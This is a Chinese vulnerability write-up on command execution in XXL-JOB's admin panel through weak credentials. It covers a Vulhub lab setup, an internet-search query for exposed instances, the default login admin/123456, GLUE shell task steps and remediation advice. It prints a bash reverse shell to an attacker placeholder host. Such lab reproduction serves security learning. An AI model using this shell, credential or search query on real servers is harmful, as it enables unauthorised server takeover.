Skip to content

XXL-JOB 后台任意命令执行漏洞

漏洞描述

XXL-JOB 是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB 分为 admin 和 executor 两端,前者为后台管理页面,后者是任务执行的客户端。

若 XXL-JOB 后台管理页面存在弱口令,攻击者可在 GLUE 模式任务代码中写入攻击代码并推送到执行器执行,从而获取服务器权限。

参考链接:

漏洞影响

XXL-JOB

网络测绘

app="XXL-JOB" || title="任务调度中心" || ("invalid request, HttpMethod not support" && port="9999")

环境搭建

docker-compose.yml

version: '2'
services:
 admin:
   image: vulhub/xxl-job:2.2.0-admin
   depends_on:
    - db
   ports:
    - "8080:8080"
 executor:
   image: vulhub/xxl-job:2.2.0-executor
   depends_on:
    - admin
   ports:
    - "9999:9999"
 db:
   image: mysql:5.7
   environment:
    - MYSQL_ROOT_PASSWORD=root

Vulhub 执行如下命令启动 2.2.0 版本的 XXL-JOB:

docker-compose up -d

环境启动后,访问 http://your-ip:8080/xxl-job-admin/toLogin 即可查看到管理端登录页面,访问 http://your-ip:9999 可以查看到客户端(executor)。

漏洞复现

弱口令 admin/123456 登录后台,新增一个 GLUE 模式任务:

运行模式 GLUE(Shell)

点击 GLUE IDE,编辑脚本:

点击执行一次,探测是否出网:

再次点击 GLUE IDE,编辑脚本反弹 shell:

plain
#!/bin/bash
bash -i >& /dev/tcp/your-ip/8888 0>&1

漏洞修复

  1. 开启 XXL-JOB 自带的鉴权组件:官方文档中搜索 “xxl.job.accessToken” ,按照文档说明启用即可。
  2. 端口防护:及时更换默认的执行器端口,不建议直接将默认的 9999 端口开放到公网。
  3. 端口访问限制:通过配置安全组限制只允许指定 IP 才能访问执行器 9999 端口。